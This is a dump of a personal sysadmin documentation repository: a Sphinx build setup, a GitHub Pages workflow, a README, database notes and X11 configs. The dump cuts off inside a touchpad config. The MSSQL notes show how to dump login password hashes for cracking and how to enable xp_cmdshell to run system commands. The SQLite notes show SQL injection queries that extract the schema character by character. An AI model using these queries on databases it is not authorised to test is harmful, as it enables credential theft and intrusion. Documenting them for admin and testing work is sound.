├── .github └── workflows │ └── publish_gh_pages.yml ├── .gitignore ├── LICENSE ├── Makefile ├── README ├── README.rst ├── _static └── GitHub-Mark-32px.png ├── _templates └── sourcelink.html ├── build_rawrst.py ├── conf.py ├── database ├── index.rst ├── microsoft-mssql.rst ├── mysql.rst └── sqlite.rst ├── etc-desktop ├── X11 │ └── xorg.conf.d │ │ ├── 00-french-keyboard.conf │ │ └── 50-synaptics.conf ├── avahi │ └── avahi-daemon.conf └── index.rst ├── etc-server ├── bitlbee │ ├── bitlbee.conf │ └── bitlbee.conf.rst ├── dhcp │ ├── dhcpd.conf │ ├── dnsmasq.conf │ └── dnsmasq.conf.rst ├── dns │ ├── unbound-with-stubby.conf │ └── unbound.conf ├── index.rst ├── jabber │ └── ejabberd.rst ├── mail.rst ├── mysql │ └── my.cnf └── web │ ├── apache.conf │ ├── collectd.rst │ ├── gitweb.rst │ ├── lighttpd.conf │ ├── nginx.conf │ ├── php.rst │ └── ssl.rst ├── etc ├── audit │ └── audit.rules ├── hosts ├── index.rst ├── iptables │ ├── empty.rules │ ├── iptables-desktop.rules │ └── iptables-server.rules ├── nftables-server.conf ├── ntp.conf ├── resolv.conf ├── samba │ └── smb.conf ├── ssh │ ├── sshd_config │ └── sshd_config.default ├── sudoers ├── sysctl.conf └── wireguard.rst ├── index.rst ├── sysadmin ├── archlinux-pkg.rst ├── bluetooth.rst ├── debian-dev.rst ├── debian.rst ├── gdb.rst ├── index.rst ├── installation.rst ├── nat.rst ├── netconfig.rst ├── netconsole.rst ├── perf-linux.rst ├── pxe-boot-server.rst ├── qemu.rst ├── qubes-os.rst ├── raspberrypi.rst ├── remote-desktop-linux.rst ├── selinux.rst ├── sound.rst ├── systemd.rst ├── tmpfs.rst ├── traffic-shaping.rst ├── user.rst └── wireshark-https.rst ├── windows ├── Vagrantfile ├── active_directory.rst ├── cmd.rst ├── hardening_script.bat ├── index.rst ├── install.rst ├── key_shortcuts.rst ├── oneliners-commands.rst ├── utc-clock.rst ├── vagrant.rst ├── vbscript.rst └── windbg-kd.rst └── www ├── htdocs ├── 403.html ├── 404.html ├── 500.html ├── 50x.html ├── down.html ├── favicon.ico ├── index-nothing.html └── robots.txt └── index.rst /.github/workflows/publish_gh_pages.yml: -------------------------------------------------------------------------------- 1 | name: Build and publish GitHub pages 2 | 3 | on: [push, pull_request] 4 | 5 | jobs: 6 | build_pages: 7 | runs-on: ubuntu-latest 8 | steps: 9 | - uses: actions/checkout@v4 10 | 11 | - name: Install dependencies 12 | run: | 13 | sudo apt-get update 14 | sudo apt-get install -y make python3-sphinx 15 | 16 | - run: make all 17 | 18 | - name: Upload HTML artifacts 19 | uses: actions/upload-artifact@v4 20 | with: 21 | name: html 22 | path: _build/html 23 | if-no-files-found: error 24 | 25 | # Update GitHub pages 26 | - run: make clean 27 | 28 | - name: Configure git user and email 29 | run: | 30 | git config --global user.email "deployer@github.local" 31 | git config --global user.name "GitHub Actions Deployer" 32 | 33 | - name: Check out gh-pages in _build/html 34 | run: | 35 | mkdir -p _build/html 36 | git -C _build/html init 37 | git -C _build/html remote add --fetch origin "$(git config remote.origin.url)" 38 | if git -C _build/html rev-parse --verify origin/gh-pages ; then 39 | git -C _build/html checkout gh-pages && 40 | git -C _build/html rm -rf . ; 41 | else 42 | git -C _build/html checkout --orphan gh-pages ; 43 | fi 44 | # Disable Jekyll engine 45 | touch _build/html/.nojekyll 46 | # Add a CNAME file 47 | printf doc.iosenag.net > _build/html/CNAME 48 | 49 | - name: Build Github pages with Sphinx 50 | run: make html 51 | 52 | - name: Show the diff 53 | run: | 54 | git -C _build/html add -A 55 | git -C _build/html diff --cached 56 | 57 | - name: Commit the new pages 58 | run: | 59 | if git -C _build/html status --short | grep '^' ; then 60 | git -C _build/html add -A 61 | git -C _build/html commit --allow-empty -m "Sphinx build of ${{ github.sha }}" 62 | git -C _build/html format-patch -n1 --stdout > _build/gh-pages.patch 63 | fi 64 | 65 | - name: Upload changes in artifacts 66 | uses: actions/upload-artifact@v4 67 | with: 68 | name: gh-pages.patch 69 | path: _build/gh-pages.patch 70 | 71 | - name: Deploy GitHub Pages 72 | if: success() && github.event_name == 'push' && github.ref == 'refs/heads/master' 73 | run: | 74 | git -C _build/html remote add pushable-origin "https://x-access-token:${{ github.token }}@github.com/${{ github.repository }}" 75 | git -C _build/html push --quiet pushable-origin gh-pages 76 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *~ 2 | *.backup 3 | *.bak 4 | .*.sw[op] 5 | 6 | *.raw.rst 7 | /_build 8 | .vagrant/ 9 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | # Makefile for Sphinx documentation 2 | # 3 | 4 | # You can set these variables from the command line. 5 | SPHINXOPTS = 6 | SPHINXBUILD = sphinx-build 7 | PAPER = 8 | BUILDDIR = _build 9 | PYTHON = python3 10 | 11 | # Directories which contain raw files 12 | RAW_DIRS = etc etc-desktop etc-server windows www 13 | 14 | # Internal variables. 15 | PAPEROPT_a4 = -D latex_paper_size=a4 16 | PAPEROPT_letter = -D latex_paper_size=letter 17 | ALLSPHINXOPTS = -d $(BUILDDIR)/doctrees $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) . 18 | # the i18n builder cannot share the environment and doctrees with the others 19 | I18NSPHINXOPTS = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) . 20 | 21 | .PHONY: all help clean html singlehtml raw-rst 22 | 23 | all: html 24 | 25 | help: 26 | @echo "Please use \`make ' where is one of" 27 | @echo " html to make standalone HTML files" 28 | @echo " singlehtml to make a single large HTML file" 29 | 30 | clean: 31 | -rm -rf $(BUILDDIR)/* 32 | find $(RAW_DIRS) -name '*.raw.rst' -delete 33 | 34 | html: raw-rst 35 | $(SPHINXBUILD) -b html $(ALLSPHINXOPTS) $(BUILDDIR)/html 36 | @echo 37 | @echo "Build finished. The HTML pages are in $(BUILDDIR)/html." 38 | 39 | singlehtml: raw-rst 40 | $(SPHINXBUILD) -b singlehtml $(ALLSPHINXOPTS) $(BUILDDIR)/singlehtml 41 | @echo 42 | @echo "Build finished. The HTML page is in $(BUILDDIR)/singlehtml." 43 | 44 | # Custom target to make raw-rst files 45 | raw-rst: 46 | $(PYTHON) build_rawrst.py $(RAW_DIRS) 47 | -------------------------------------------------------------------------------- /README: -------------------------------------------------------------------------------- 1 | Generic Configuration README 2 | ============================ 3 | 4 | .. image:: https://github.com/fishilico/generic-config/actions/workflows/publish_gh_pages.yml/badge.svg 5 | :target: https://github.com/fishilico/generic-config/actions/workflows/publish_gh_pages.yml 6 | 7 | https://fishilico.github.io/generic-config/ 8 | 9 | Overview 10 | -------- 11 | This project aims to give a quick technical perspective of the configuration 12 | files I need to modify to get a system which fits my needs in terms of security 13 | and usability. 14 | 15 | Disclaimer 16 | ---------- 17 | *This project is NOT intended to be a tutorial or a reference for anyone else*. 18 | There is absolutely **NO WARRANTY** for the content of this project to give you 19 | a safe and usable configuration. Please consider this files as a cheat-sheet or 20 | as some kind of last resort documentation to be looking for when you really do 21 | not know how to configure a piece of software. 22 | 23 | History 24 | ------- 25 | Whenever I install a new Linux machine there are config files that need to be 26 | edited. For example, on a server it's a good idea to disable remote ``root`` 27 | login after an administrator account has been created. Another example happens 28 | when a desktop computer needs a basic firewall (only to prevent for this 29 | computer from being open to the four winds): which rules should I configure? 30 | 31 | At first I've written some text files and memos to keep track of these things. 32 | However, system administration of a few personal hosts (servers and desktop 33 | workstations) becomes really hard when you have not got a way to keep 34 | configuration "in sync with your mind". 35 | 36 | Another issue occurred several years ago. One of my friends who was new to IPv6 37 | wanted to know what rules I was using in the ``ip6tables`` firewall of my 38 | server. I gave him a kind of "anonymized file" with rules which were not 39 | specific to my server and he found out that there were some problems with IPv6 40 | fragmentation. Therefore I needed to add some rules and to update the firewall 41 | of every host I had. 42 | 43 | So I've started my `Generic Configuration` project to create a place where I 44 | could write down the non-specific files I can show to my friends and to other 45 | people. In order to promote getting feedback from my notes, I made this project 46 | public, with a Git tree hosted by GitHub. Nowadays the HTML pages are hosted by 47 | GitHub Pages, and a 48 | `Circle-Ci job `_ has been 49 | configured to rebuild the pages every time branch ``master`` is updated. 50 | 51 | When you are reading the files I've written, please keep in mind that no host 52 | in the world would run with only the things I describe, as they most likely 53 | require some slight customization from their sysadmins. 54 | 55 | Finally, I use a version control system (Git) to ease the way people can 56 | contribute to this project. So if you find a bug and fill an issue or a pull 57 | request to help me improve this project, what would be really nice! The project 58 | is located on https://github.com/fishilico/generic-config. 59 | 60 | Structure 61 | --------- 62 | 63 | This project is organized in folders by field: 64 | 65 | - ``_: common files in ``/etc`` folder which are in every host 66 | - ``_: desktop-specific configuration of some ``/etc`` files 67 | - ``_: config files of services which can be found on a server 68 | - ``_: some thoughts and tips&tricks about system administration 69 | - ``_: content related to using Microsoft Windows systems 70 | - ``_: content of ``/var/www`` on a web server without specific purpose 71 | 72 | License 73 | ------- 74 | This project is licensed under 75 | `Creative Commons Attribution Share Alike 4.0 International `_ 76 | (`CC-BY-SA-4.0 `_). 77 | -------------------------------------------------------------------------------- /README.rst: -------------------------------------------------------------------------------- 1 | README -------------------------------------------------------------------------------- /_static/GitHub-Mark-32px.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fishilico/generic-config/2593f3f7d5f0a891e278d773c0cd3b2120b656f0/_static/GitHub-Mark-32px.png -------------------------------------------------------------------------------- /_templates/sourcelink.html: -------------------------------------------------------------------------------- 1 | {%- if show_source and has_source and sourcename %} 2 |

{{ _('This Page') }}

3 | 28 | {%- endif %} 29 | -------------------------------------------------------------------------------- /build_rawrst.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:UTF-8 -*- 3 | """Build RST files to display raw files in Sphinx""" 4 | 5 | import os 6 | import os.path 7 | import sys 8 | 9 | 10 | # Templates 11 | RAWRST_HEADER = """``{dirpath}/{filename}`` 12 | {underline} 13 | :download:`Download file<{filename}>` 14 | 15 | """ 16 | 17 | 18 | def build_rawrst_file(dirpath, filename): 19 | """Build the corresponding raw RST file for filename in dirpath""" 20 | if '/' in filename or '\\' in filename: 21 | raise ValueError("Invalid filename: {}".format(filename)) 22 | 23 | content = RAWRST_HEADER 24 | if filename.endswith(('.ico', '.jpg', '.png')): 25 | content += '.. image:: {filename}\n :alt: {dirpath}/{filename}\n' 26 | else: 27 | content += '.. literalinclude:: {filename}\n' 28 | if filename.endswith(('.htm', '.html')): 29 | content += ' :language: html\n' 30 | elif filename.endswith(('.ini', '.inf')): 31 | content += ' :language: ini\n' 32 | elif 'apache' in filename: 33 | content += ' :language: apache\n' 34 | elif 'lighttpd' in filename: 35 | content += ' :language: lighttpd\n' 36 | elif 'nginx' in filename: 37 | content += ' :language: nginx\n' 38 | else: 39 | content += ' :language: sh\n' 40 | 41 | content = content.format( 42 | dirpath=dirpath, 43 | filename=filename, 44 | underline='=' * (len(dirpath) + len(filename) + 5)) 45 | 46 | with open(os.path.join(dirpath, filename + '.raw.rst'), 'w') as rstfd: 47 | rstfd.write(content) 48 | 49 | 50 | def build_rawrst_dir(dirpath): 51 | """Build all needed raw RST files under dirpath""" 52 | for root, dirs, files in os.walk(dirpath): 53 | # Filter-out hidden directories such as .vagrant 54 | dirs[:] = [d for d in dirs if not d.startswith('.')] 55 | for filename in files: 56 | if filename.lower().endswith(('~', '.bak', '.rst')): 57 | continue 58 | # Ignore files already associated with a .rst 59 | if os.path.exists(os.path.join(root, filename + '.rst')): 60 | continue 61 | build_rawrst_file(root, filename) 62 | 63 | 64 | if __name__ == '__main__': 65 | for directory in sys.argv: 66 | build_rawrst_dir(directory) 67 | -------------------------------------------------------------------------------- /conf.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # 4 | # Generic Configuration build configuration file, created by 5 | # sphinx-quickstart on Sun Dec 29 22:54:32 2013. 6 | # 7 | # This file is execfile()d with the current directory set to its containing dir. 8 | # 9 | # Note that not all possible configuration values are present in this 10 | # autogenerated file. 11 | # 12 | # All configuration values have a default; values that are commented out 13 | # serve to show the default. 14 | 15 | import sys, os 16 | 17 | # If extensions (or modules to document with autodoc) are in another directory, 18 | # add these directories to sys.path here. If the directory is relative to the 19 | # documentation root, use os.path.abspath to make it absolute, like shown here. 20 | #sys.path.insert(0, os.path.abspath('.')) 21 | 22 | # -- General configuration ----------------------------------------------------- 23 | 24 | # If your documentation needs a minimal Sphinx version, state it here. 25 | #needs_sphinx = '1.0' 26 | 27 | # Add any Sphinx extension module names here, as strings. They can be extensions 28 | # coming with Sphinx (named 'sphinx.ext.*') or your custom ones. 29 | extensions = [] 30 | 31 | # Add any paths that contain templates here, relative to this directory. 32 | templates_path = ['_templates'] 33 | 34 | # The suffix of source filenames. 35 | source_suffix = '.rst' 36 | 37 | # The encoding of source files. 38 | #source_encoding = 'utf-8-sig' 39 | 40 | # The master toctree document. 41 | master_doc = 'index' 42 | 43 | # General information about the project. 44 | project = 'Generic Config' 45 | copyright = '2013-2023, Nicolas Iooss' 46 | 47 | # The version info for the project you're documenting, acts as replacement for 48 | # |version| and |release|, also used in various other places throughout the 49 | # built documents. 50 | # 51 | # The short X.Y version. 52 | version = '0.1' 53 | # The full version, including alpha/beta/rc tags. 54 | release = '0.1' 55 | 56 | # The language for content autogenerated by Sphinx. Refer to documentation 57 | # for a list of supported languages. 58 | #language = None 59 | 60 | # There are two options for replacing |today|: either, you set today to some 61 | # non-false value, then it is used: 62 | #today = '' 63 | # Else, today_fmt is used as the format for a strftime call. 64 | #today_fmt = '%B %d, %Y' 65 | 66 | # List of patterns, relative to source directory, that match files and 67 | # directories to ignore when looking for source files. 68 | exclude_patterns = ['_build'] 69 | 70 | # The reST default role (used for this markup: `text`) to use for all documents. 71 | #default_role = None 72 | 73 | # If true, '()' will be appended to :func: etc. cross-reference text. 74 | #add_function_parentheses = True 75 | 76 | # If true, the current module name will be prepended to all description 77 | # unit titles (such as .. function::). 78 | #add_module_names = True 79 | 80 | # If true, sectionauthor and moduleauthor directives will be shown in the 81 | # output. They are ignored by default. 82 | #show_authors = False 83 | 84 | # The name of the Pygments (syntax highlighting) style to use. 85 | pygments_style = 'sphinx' 86 | 87 | # A list of ignored prefixes for module index sorting. 88 | #modindex_common_prefix = [] 89 | 90 | 91 | # -- Options for HTML output --------------------------------------------------- 92 | 93 | # The theme to use for HTML and HTML Help pages. See the documentation for 94 | # a list of builtin themes. 95 | #html_theme = 'default' 96 | html_theme = 'nature' 97 | 98 | # Theme options are theme-specific and customize the look and feel of a theme 99 | # further. For a list of options available for each theme, see the 100 | # documentation. 101 | #html_theme_options = {} 102 | 103 | # Add any paths that contain custom themes here, relative to this directory. 104 | #html_theme_path = [] 105 | 106 | # The name for this set of Sphinx documents. If None, it defaults to 107 | # " v documentation". 108 | html_title = project 109 | 110 | # A shorter title for the navigation bar. Default is the same as html_title. 111 | #html_short_title = None 112 | 113 | # The name of an image file (relative to this directory) to place at the top 114 | # of the sidebar. 115 | #html_logo = None 116 | 117 | # The name of an image file (within the static path) to use as favicon of the 118 | # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 119 | # pixels large. 120 | #html_favicon = None 121 | 122 | # Add any paths that contain custom static files (such as style sheets) here, 123 | # relative to this directory. They are copied after the builtin static files, 124 | # so a file named "default.css" will overwrite the builtin "default.css". 125 | html_static_path = ['_static'] 126 | 127 | # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, 128 | # using the given strftime format. 129 | #html_last_updated_fmt = '%b %d, %Y' 130 | 131 | # If true, SmartyPants will be used to convert quotes and dashes to 132 | # typographically correct entities. 133 | #html_use_smartypants = True 134 | 135 | # Custom sidebar templates, maps document names to template names. 136 | #html_sidebars = {} 137 | 138 | # Additional templates that should be rendered to pages, maps page names to 139 | # template names. 140 | #html_additional_pages = {} 141 | 142 | # If false, no module index is generated. 143 | #html_domain_indices = True 144 | 145 | # If false, no index is generated. 146 | #html_use_index = True 147 | 148 | # If true, the index is split into individual pages for each letter. 149 | #html_split_index = False 150 | 151 | # If true, links to the reST sources are added to the pages. 152 | #html_show_sourcelink = True 153 | 154 | # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. 155 | #html_show_sphinx = True 156 | 157 | # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. 158 | #html_show_copyright = True 159 | 160 | # If true, an OpenSearch description file will be output, and all pages will 161 | # contain a tag referring to it. The value of this option must be the 162 | # base URL from which the finished HTML is served. 163 | #html_use_opensearch = '' 164 | 165 | # This is the file name suffix for HTML files (e.g. ".xhtml"). 166 | #html_file_suffix = None 167 | 168 | # Output file base name for HTML help builder. 169 | htmlhelp_basename = 'GenericConfigdoc' 170 | 171 | 172 | # -- Options for LaTeX output -------------------------------------------------- 173 | 174 | latex_elements = { 175 | # The paper size ('letterpaper' or 'a4paper'). 176 | #'papersize': 'letterpaper', 177 | 178 | # The font size ('10pt', '11pt' or '12pt'). 179 | #'pointsize': '10pt', 180 | 181 | # Additional stuff for the LaTeX preamble. 182 | #'preamble': '', 183 | } 184 | 185 | # Grouping the document tree into LaTeX files. List of tuples 186 | # (source start file, target name, title, author, documentclass [howto/manual]). 187 | latex_documents = [ 188 | ('README', 'GenericConfig.tex', 'Generic Configuration', 189 | 'Nicolas Iooss', 'manual'), 190 | ] 191 | 192 | # The name of an image file (relative to this directory) to place at the top of 193 | # the title page. 194 | #latex_logo = None 195 | 196 | # For "manual" documents, if this is true, then toplevel headings are parts, 197 | # not chapters. 198 | #latex_use_parts = False 199 | 200 | # If true, show page references after internal links. 201 | #latex_show_pagerefs = False 202 | 203 | # If true, show URL addresses after external links. 204 | #latex_show_urls = False 205 | 206 | # Documents to append as an appendix to all manuals. 207 | #latex_appendices = [] 208 | 209 | # If false, no module index is generated. 210 | #latex_domain_indices = True 211 | 212 | 213 | # -- Options for manual page output -------------------------------------------- 214 | 215 | # One entry per manual page. List of tuples 216 | # (source start file, name, description, authors, manual section). 217 | man_pages = [ 218 | ('README', 'genericconfig', 'Generic Configuration', 219 | ['Nicolas Iooss'], 1) 220 | ] 221 | 222 | # If true, show URL addresses after external links. 223 | #man_show_urls = False 224 | 225 | 226 | # -- Options for Texinfo output ------------------------------------------------ 227 | 228 | # Grouping the document tree into Texinfo files. List of tuples 229 | # (source start file, target name, title, author, 230 | # dir menu entry, description, category) 231 | texinfo_documents = [ 232 | ('README', 'GenericConfig', 'Generic Configuration', 233 | 'Nicolas Iooss', 'GenericConfig', 'One line description of project.', 234 | 'Miscellaneous'), 235 | ] 236 | 237 | # Documents to append as an appendix to all manuals. 238 | #texinfo_appendices = [] 239 | 240 | # If false, no module index is generated. 241 | #texinfo_domain_indices = True 242 | 243 | # How to display URL addresses: 'footnote', 'no', or 'inline'. 244 | #texinfo_show_urls = 'footnote' 245 | -------------------------------------------------------------------------------- /database/index.rst: -------------------------------------------------------------------------------- 1 | Databases 2 | ========= 3 | 4 | This section contains information about some database engines 5 | 6 | .. toctree:: 7 | :maxdepth: 2 8 | :glob: 9 | 10 | * 11 | -------------------------------------------------------------------------------- /database/microsoft-mssql.rst: -------------------------------------------------------------------------------- 1 | Microsoft SQL Server 2 | ==================== 3 | 4 | MSSQL queries 5 | ------------- 6 | 7 | Show the version of the database: 8 | 9 | .. code-block:: mysql 10 | 11 | SELECT @@version 12 | GO 13 | 14 | List available databases: 15 | 16 | .. code-block:: mysql 17 | 18 | SELECT name FROM sys.Databases; 19 | SELECT * FROM master..sysdatabases; 20 | 21 | List available tables from a database: 22 | 23 | .. code-block:: mysql 24 | 25 | USE msdb; 26 | SELECT name FROM sys.Tables 27 | 28 | SELECT name FROM sysobjects WHERE xtype='U'; 29 | 30 | List columns of a table: 31 | 32 | .. code-block:: mysql 33 | 34 | SELECT syscolumns.* FROM syscolumns 35 | JOIN sysobjects ON syscolumn.id=sysobjects.id 36 | WHERE sysobjects.name='my_table' 37 | 38 | Enumerate users (type "``U``" is for ``WINDOWS_LOGIN``, like ``NT AUTHORITY\SYSTEM`` account, and "``S``" is for ``SQL_LOGIN``, like ``sa`` account): 39 | 40 | .. code-block:: mysql 41 | 42 | SELECT principal_id, sid, name, type, type_desc, credential_id, owning_principal_id 43 | FROM master.sys.server_principals 44 | 45 | -- With passwords (John The Ripper format "mssql") 46 | SELECT name, password FROM sysxlogins; 47 | -- since MSSQL 2005 (JtR format "mssql05", after adding "0x" prefix to hashes): 48 | SELECT name, password_hash FROM sys.sql_logins; 49 | 50 | Run system commands: 51 | 52 | .. code-block:: mysql 53 | 54 | EXEC master.dbo.sp_configure 'show advanced options', 1 55 | RECONFIGURE 56 | EXEC master.dbo.sp_configure 'xp_cmdshell', 1 57 | RECONFIGURE 58 | GO 59 | 60 | xp_cmdshell "whoami" 61 | GO 62 | 63 | 64 | Docker container on Linux 65 | ------------------------- 66 | 67 | In order to use a MSSQL server on a development workstation, a Docker image can be used. 68 | Microsoft provides an image for both Linux and Windows environments. 69 | This is documented on https://docs.microsoft.com/en-us/sql/linux/quickstart-install-connect-docker?view=sql-server-2017&pivots=cs1-bash and the building scripts are published on https://github.com/Microsoft/mssql-docker. 70 | 71 | Steps on Linux: 72 | 73 | * Enable Docker overlay2 storage driver (cf. https://docs.docker.com/storage/storagedriver/overlayfs-driver/#configure-docker-with-the-overlay-or-overlay2-storage-driver). 74 | Write this in ``/etc/docker/daemon.json``: 75 | 76 | .. code-block:: json 77 | 78 | { 79 | "storage-driver": "overlay2" 80 | } 81 | 82 | * Pull Microsoft Docker image (cf. https://hub.docker.com/_/microsoft-mssql-server): 83 | 84 | .. code-block:: sh 85 | 86 | docker pull mcr.microsoft.com/mssql/server:2017-latest 87 | 88 | * Run a server: 89 | 90 | .. code-block:: sh 91 | 92 | docker run -e 'ACCEPT_EULA=Y' -e 'SA_PASSWORD=yourStrong(!)Password' -p 127.0.0.1:1433:1433 --name mssql -d mcr.microsoft.com/mssql/server:2017-latest 93 | 94 | * Run SQL commands on the server (if ``-Q`` option is not used, an interactive prompt appears and the user needs to enter ``GO`` in order to launch queries and ``QUIT`` to exit): 95 | 96 | .. code-block:: sh 97 | 98 | docker exec -it mssql /bin/bash 99 | /opt/mssql-tools/bin/sqlcmd -S localhost -U sa -P "$SA_PASSWORD" -Q 'SELECT @@SERVERNAME' 100 | 101 | On Windows, the Docker images is available on https://hub.docker.com/r/microsoft/mssql-server-windows-developer/ 102 | -------------------------------------------------------------------------------- /database/sqlite.rst: -------------------------------------------------------------------------------- 1 | SQLite 2 | ====== 3 | 4 | Introduction 5 | ------------ 6 | 7 | SQLite is a database engine that directly uses a file, for example named ``db.sqlite``. 8 | There is therefore no need to authenticate the database users in order for them to access the data: everything is managed by the access control of the file itself. 9 | More precisely, when modifying the database, the directory that stores the database file needs also to be writable by the engine, in order to create and remove a journal file. 10 | 11 | SQLite can be used by applications to store settings, user information, messages, etc. 12 | Its engine is also used by projects such as `OSQuery `_ in order to benefit from a SQL interpreter. 13 | 14 | 15 | Basic commands 16 | -------------- 17 | 18 | In order to dump the content of a database file named ``db.sqlite`` from the command line: 19 | 20 | .. code-block:: sh 21 | 22 | sqlite3 < /dev/null -bail -batch -cmd .dump db.sqlite 23 | 24 | From the interactive prompt given by ``sqlite3``, it is possible to run SQL statements as well as special SQLite commands, prefixed with a dot. 25 | 26 | .. code-block:: sh 27 | 28 | # Show available commands and some help 29 | .help 30 | 31 | # Show the version 32 | .version 33 | SELECT SQLITE_VERSION(); 34 | 35 | # Quit 36 | .exit 37 | 38 | # List tables from the database 39 | .tables 40 | # Dump the schema of every table of the database 41 | .schema 42 | 43 | # List tables and dump the schema, for tables which names start with "user" 44 | .tables user% 45 | .schema user% 46 | 47 | # Change the output mode of SELECT statement (default one is pretty): 48 | # * Each cell in a new line 49 | .mode line 50 | # * Comma-separated values 51 | .mode csv 52 | # * Fixed-wicth columns 53 | .mode column 54 | .width 10 20 50 50 5 55 | # * Pretty tables (the default one in OSQuery) 56 | .mode pretty 57 | # * Pipe-separated values (the default one in SQLite) 58 | .mode list 59 | 60 | 61 | SQL statements 62 | -------------- 63 | 64 | SQLite supports standard SQL statements: ``SELECT``, ``INSERT INTO``, ``UPDATE``, ``DELETE``, etc. 65 | 66 | Several ``SELECT`` statements can be merged together using: 67 | 68 | * ``UNION ALL`` to concatenate the results ; 69 | * ``UNION`` to concatenate the results, removing the duplicated rows ; 70 | * ``INTERSECT`` to only keep the rows in common ; 71 | * ``EXCEPT`` to exclude some rows. 72 | 73 | It is also possible to join tables (``LEFT JOIN``, ``INNER JOIN``, etc.) using conditions expressed as: 74 | 75 | .. code-block:: sql 76 | 77 | SELECT * FROM users LEFT JOIN user_groups ON users.uid = user_groups.uid; 78 | SELECT * FROM users LEFT JOIN user_groups USING (uid); 79 | 80 | When performing a ``SELECT`` statement, it is possible to group some rows with a common value using ``GROUP BY column``. 81 | In order to filter results before grouping, it is possible to use a ``WHERE condition`` clause. 82 | To filter results after grouping, the clause to use is ``HAVING condition``. 83 | 84 | The filters may use ``LIKE`` to match cells according to a pattern. 85 | The pattern can use ``_`` as a wildcard for a single character and ``%`` as a wildcard for multiple characters. 86 | In order to escape ``_``, engines such as MSSQL use a syntax like ``[_]``, but SQLite uses something else: 87 | 88 | .. code-block:: sql 89 | 90 | SELECT * FROM objects WHERE name LIKE 'prefix\_%' ESCAPE '\'; 91 | 92 | To print timestamps as a human-readable date, there exists a function, ``DATETIME``. 93 | For example: 94 | 95 | .. code-block:: sql 96 | 97 | SELECT DATETIME(users.last_update_time, 'unixepoch') FROM users; 98 | 99 | Schema table 100 | ------------ 101 | 102 | According to the `documentation `_, every SQLite database contains a single "schema table" named ``sqlite_master`` that stores the schema for that database. 103 | 104 | .. code-block:: sql 105 | 106 | sqlite> .schema sqlite_master 107 | CREATE TABLE sqlite_master ( 108 | type text, 109 | name text, 110 | tbl_name text, 111 | rootpage integer, 112 | sql text 113 | ); 114 | 115 | To understand its content in actual database, let's create a new table in an empty database. 116 | 117 | .. code-block:: sql 118 | 119 | DROP TABLE IF EXISTS `users`; 120 | CREATE TABLE IF NOT EXISTS `users` ( 121 | `uid` INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, 122 | `name` TEXT NOT NULL, 123 | `email` VARCHAR(255) UNIQUE NOT NULL, 124 | `password` VARCHAR(110) NOT NULL, 125 | `admin` TINYINT(1) NOT NULL DEFAULT '0', 126 | `created` DATETIME NOT NULL 127 | ); 128 | 129 | After executing these statements, the schema table contains the ``CREATE TABLE`` statement and other objects: 130 | 131 | .. code-block:: text 132 | 133 | sqlite> SELECT * FROM sqlite_master; 134 | table|users|users|2|CREATE TABLE `users` ( 135 | `uid` INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, 136 | `name` TEXT NOT NULL, 137 | `email` VARCHAR(255) UNIQUE NOT NULL, 138 | `password` VARCHAR(110) NOT NULL, 139 | `admin` TINYINT(1) NOT NULL DEFAULT '0', 140 | `created` DATETIME NOT NULL 141 | ) 142 | index|sqlite_autoindex_users_1|users|3| 143 | table|sqlite_sequence|sqlite_sequence|4|CREATE TABLE sqlite_sequence(name,seq) 144 | 145 | From a SQL injection vulnerability, this table can be obtained using queries such as: 146 | 147 | .. code-block:: sql 148 | 149 | -- Concatenate all fields and select the 1st entry (using COALESCE to support NULL values) 150 | SELECT type||';'||name||';'||tbl_name||';'||rootpage||';'||COALESCE(sql,'') FROM sqlite_master 151 | LIMIT 0,1; 152 | 153 | -- Concatenate all fields of all rows 154 | SELECT GROUP_CONCAT(type||';'||name||';'||tbl_name||';'||rootpage||';'||COALESCE(sql,''),'^') 155 | FROM sqlite_master; 156 | 157 | To exfiltrate the characters of such a string, functions ``HEX``, ``SUBSTR`` and ``LENGTH`` (documented in `Built-In Scalar SQL Functions `_) can be used. 158 | For example: 159 | 160 | .. code-block:: sql 161 | 162 | sqlite> SELECT HEX('hello'); 163 | 68656C6C6F 164 | sqlite> SELECT LENGTH(HEX('hello')); 165 | 10 166 | sqlite> SELECT SUBSTR(HEX('hello'),1,1)='6'; 167 | 1 168 | sqlite> SELECT SUBSTR(HEX('hello'),1,1)>'9'; 169 | 0 170 | -------------------------------------------------------------------------------- /etc-desktop/X11/xorg.conf.d/00-french-keyboard.conf: -------------------------------------------------------------------------------- 1 | # Read and parsed by systemd-localed. It's probably wise not to edit this file 2 | # manually too freely. 3 | Section "InputClass" 4 | # Other system may use: Identifier "evdev keyboard catchall" 5 | # and MatchDevicePath "/dev/input/event*" 6 | Identifier "system-keyboard" 7 | MatchIsKeyboard "on" 8 | Option "XkbLayout" "fr" 9 | Option "XkbModel" "pc105" 10 | # Variant "latin9" is advertised as the legacy alternative one 11 | # (it provides some special characters through AltGr+key combos). 12 | # Variant "oss" is the current most useful layout to write in French. 13 | Option "XkbVariant" "oss" 14 | Option "XkbOptions" "terminate:ctrl_alt_bksp" 15 | EndSection 16 | -------------------------------------------------------------------------------- /etc-desktop/X11/xorg.conf.d/50-synaptics.conf: -------------------------------------------------------------------------------- 1 | # Example xorg.conf.d snippet that assigns the touchpad driver 2 | # to all touchpads. See xorg.conf.d(5) for more information on 3 | # InputClass. 4 | # DO NOT EDIT THIS FILE, your distribution will likely overwrite 5 | # it when updating. Copy (and rename) this file into 6 | # /etc/X11/xorg.conf.d first. 7 | # Additional options may be added in the form of 8 | # Option "OptionName" "value" 9 | # 10 | # This file has been modified to setup Circule Scrolling with Touchpad: 11 | # https://wiki.archlinux.org/index.php/Touchpad_Synaptics#Circular_Scrolling 12 | Section "InputClass" 13 | Identifier "touchpad catchall" 14 | Driver "synaptics" 15 | MatchIsTouchpad "on" 16 | Option "TapButton1" "1" 17 | Option "TapButton2" "2" 18 | Option "TapButton3" 